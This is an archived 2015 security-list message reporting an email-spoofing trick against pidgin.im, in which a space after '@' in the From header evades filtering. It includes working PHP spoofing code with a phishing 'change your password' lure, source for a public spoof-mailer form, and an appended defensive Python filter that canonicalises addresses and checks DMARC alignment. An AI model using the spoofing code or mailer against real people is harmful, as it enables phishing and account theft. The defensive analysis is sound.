Email Server Exploit, I can bypass ALL email protection from your side even DMARC and SPF records

ashesh1708 at gmail.com ashesh1708 at gmail.com
Wed Jun 17 10:11:13 EDT 2015


<html>
<body>
    
    <h3>I can use @pidgin.im to spoof messages
[SPF RECORD BYPASS]</h3><pre>I see that your
mail server is protected by anti-spoofing, but I found
a way to bypass this and send an email from
`support@pidgin.im`, `admin@pidgin.im`,
`ANYTHING@pidgin.im` to anyone. A POC is attached.

Here's the PHP code I use to achieve this:

______________________________________________________________________________
**THIS WILL NOT WORK**
--------------------------------

    <?php
    // Plain From: header -- the variant the report says is blocked.
    $to = "victim@example.com";
    $subject = "Change Your password";
    $txt = "Due to recent Heartbleed attack , We
request you to change your password [VIRUS LINK]
";
    $headers = "From: support@pidgin.im";
    mail($to, $subject, $txt, $headers);
    ?>

______________________________________________________________________________
**THIS WILL WORK**
--------------------------------

    <?php
    $to = "victim@example.com";
    $subject = "Change Your password";
    $txt = "Due to recent Heartbleed attack , We
request you to change your password [VIRUS LINK]
";
    $headers = "From: support@ pidgin.im"; // This line is edited: a space after '@'
    mail($to, $subject, $txt, $headers);
    ?>
______________________________________________________________________________
**EXPLOIT SCENARIO**
-----------------------------------
Using this I can send a spoofed email to the victim
telling him/her to change his/her password. Even if he/she
sees that the mail originated from
`support@pidgin.im`, he has no other way than to
believe it. Clicking on the link takes him to a
website where certain JavaScript is executed, or
anything more dangerous!

If I send a mail from attacker@pidgin.im or from
attacker@ pidgin.im, they are both considered the same
by email providers.
Using this I can send a spoofed email to the victim
telling him/her to change his/her password. Then I use the
appropriate PHP code I mentioned above. It
appears the same when received.

1) Phishing
2) Change password
3) Make fake transaction
4) Click on virus link
5) Removes the trust of the user in the website
etc.

Scenario 1:

Jim meets Jack physically and they decide on a deal. An
attacker somehow knows this and wants the deal to be
cancelled. He sends a spoofed mail from
admin@xyz.com to jim@pidgin.im telling him that the deal
is cancelled for some reason.

Scenario 2:

One day Jim opens his email and sees an email from
security@pidgin.im regarding changing his password. He
doubts whether pidgin.im is a real company or not. Then
he opens pidgin.im in his web browser, which
redirects him to the ORIGINAL pidgin.im; it confirms
that pidgin.im is original!!!

(Big companies own all domains, e.g.
http://google.com, http://google.co.in and
http://google.co.uk are all owned by Google; the same is
the case with Yahoo!)
He clicks that change password link; clicking on
the link takes him to a website where certain
JavaScript is executed which steals his pidgin.im
id and password (SESSION). The results can be more
dangerous.

Proof of Concept

Two images are attached. Each one shows the use of
the code I mentioned above.

I have made a website (http://cdata.comule.com) to
send the spoofed mail, combining the two codes.
(Please don't send more than 18 mails per minute,
and wait 5 minutes for the mail to arrive.)

The source code of my website is :

a) index.php

<html>
<body>
<h3>If using SMTP protection use
(username@[SPACE]example.com) in the "From"
field, e.g. (world123@ facebook.com)</h3>
<form action="submit.php" method="post">
 To: <input type="text" name="to"><br>
 From: <input type="text" name="from"><br>
 Subject: <input type="text" name="subject"><br>
 Message: <textarea name="message"></textarea><br>
  <input type="submit">
</form>
</body>
</html>



b) submit.php

<?php
$to = $_POST["to"];
$subject = $_POST["subject"];
$txt = $_POST["message"];
// The submitted From value is passed straight into the header block,
// so a value such as "support@ pidgin.im" reaches mail() unchanged.
$headers = "From: " . $_POST["from"];
if (mail($to, $subject, $txt, $headers)) {
    // Escape the echoed values so the confirmation page cannot be
    // injected into via the form fields.
    echo "SENT";
    echo "<br>";
    echo "TO: " . htmlspecialchars($_POST["to"]);
    echo "<br>";
    echo "From: " . htmlspecialchars($_POST["from"]);
    echo "<br>";
    echo "Subject: " . htmlspecialchars($_POST["subject"]);
    echo "<br>";
    echo "Content: " . htmlspecialchars($_POST["message"]);
    echo "<br>";
} else {
    echo "Fail";
}
?>

I made a Proof of Concept video about how this can
be exploited in Yahoo! Mail
(https://www.dropbox.com/s/ir8dprnetk322n8/POC.mp4).
The same applies to you.


POC:
http://ultraimg.com/images/9b33ed231761.png</pre><br/>DATE:
   17/06/2015<br/>HOUR:     02:11:13 pm<br/>IP:   
   127.6.47.129<br/><br/>
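Editor's note on the report above. The trick it describes rests on one fact: a receiver's address parser discards CFWS (whitespace and comments) around the "@" of an addr-spec, so "support@ pidgin.im" is displayed, and compared, as "support@pidgin.im", while a filter that string-compares the raw From header sees a different value. The receiving-side check a practitioner would want is to canonicalise the From header first, compare the canonical domain against whatever domain SPF or DKIM actually authenticated (DMARC alignment), and treat CFWS padding next to "@" as a spoofing indicator in its own right, since no mail client emits it. The following is an added example written for this archive page; it is neither the reporter's code nor Pidgin's. It uses Python's standard-library parser as the stand-in for "what the provider displays"; the sample header values, the authenticated domains (cdata.comule.com, mail.pidgin.im) and the two-label organisational-domain shortcut are constructed assumptions for the demonstration.

```python
"""Canonicalise an RFC 5322 From: header before applying anti-spoofing
policy, and flag CFWS padding (whitespace or comments next to '@').

Added example for this list archive; not the reporter's code and not
Pidgin's. Sample headers and authenticated domains are constructed."""
import re
from email.utils import parseaddr

# Constructed sample From: header values (not from any real message).
SAMPLES = [
    "support@pidgin.im",
    "support@ pidgin.im",
    "Pidgin Support <support@ pidgin.im>",
    "Pidgin Support <support@(x) pidgin.im>",
    "support@pidgin.im.attacker.example",
]

# Whitespace or a comment delimiter immediately adjacent to '@'.
# RFC 5322 grammar permits CFWS there, but no mail client emits it.
_CFWS_AT = re.compile(r"@[\s(]|[\s)]@")


def canonical_from(header_value):
    """Return (display_name, addr_spec, domain, padded).

    parseaddr() discards CFWS around '@', which is why 'support@ pidgin.im'
    is shown as 'support@pidgin.im'; padded records that the raw header
    had such padding before it was normalised away."""
    name, addr = parseaddr(header_value)
    domain = addr.rsplit("@", 1)[1].lower() if "@" in addr else ""
    return name, addr, domain, bool(_CFWS_AT.search(header_value))


def org_domain(domain):
    """Organisational domain. Assumption/shortcut: the last two labels.
    A production DMARC filter uses the Public Suffix List instead."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def dmarc_aligned(header_value, authenticated_domain, strict=False):
    """DMARC identifier alignment of the canonical From domain with the
    domain SPF (MAIL FROM) or DKIM (d=) actually authenticated.
    Relaxed: organisational domains equal. Strict: exact match."""
    _, _, from_domain, _ = canonical_from(header_value)
    if not from_domain:
        return False
    auth = authenticated_domain.lower()
    if strict:
        return from_domain == auth
    return org_domain(from_domain) == org_domain(auth)


def verdict(header_value, authenticated_domain):
    """Decision a receiving filter would take for one message."""
    _, addr, domain, padded = canonical_from(header_value)
    if not addr:
        return "reject: unparseable From"
    if padded:
        return "reject: CFWS padding inside addr-spec (%r)" % header_value
    if not dmarc_aligned(header_value, authenticated_domain):
        return "reject: From domain %s not aligned with %s" % (
            domain, authenticated_domain)
    return "pass"


if __name__ == "__main__":
    # The PHP host in the report is not pidgin.im, so SPF can at best
    # authenticate that host's own domain (constructed value here).
    for sample in SAMPLES:
        print("%-42s -> %s" % (sample, verdict(sample, "cdata.comule.com")))
    # A legitimate message relayed by a pidgin.im subdomain passes relaxed
    # alignment but not strict alignment.
    print("relaxed:", dmarc_aligned("support@pidgin.im", "mail.pidgin.im"))
    print("strict: ", dmarc_aligned("support@pidgin.im", "mail.pidgin.im",
                                    strict=True))
```

Two design points. The padding check runs before alignment on purpose: even where alignment would pass, a From header with a space or comment glued to "@" was not produced by a normal client, so it is worth rejecting or at least tagging on its own. And the alignment is computed on the canonical domain, never on the raw header string, which is the single change that closes the gap the report relies on.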

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20150617/8ec2185e/attachment-0001.html>


More information about the security mailing list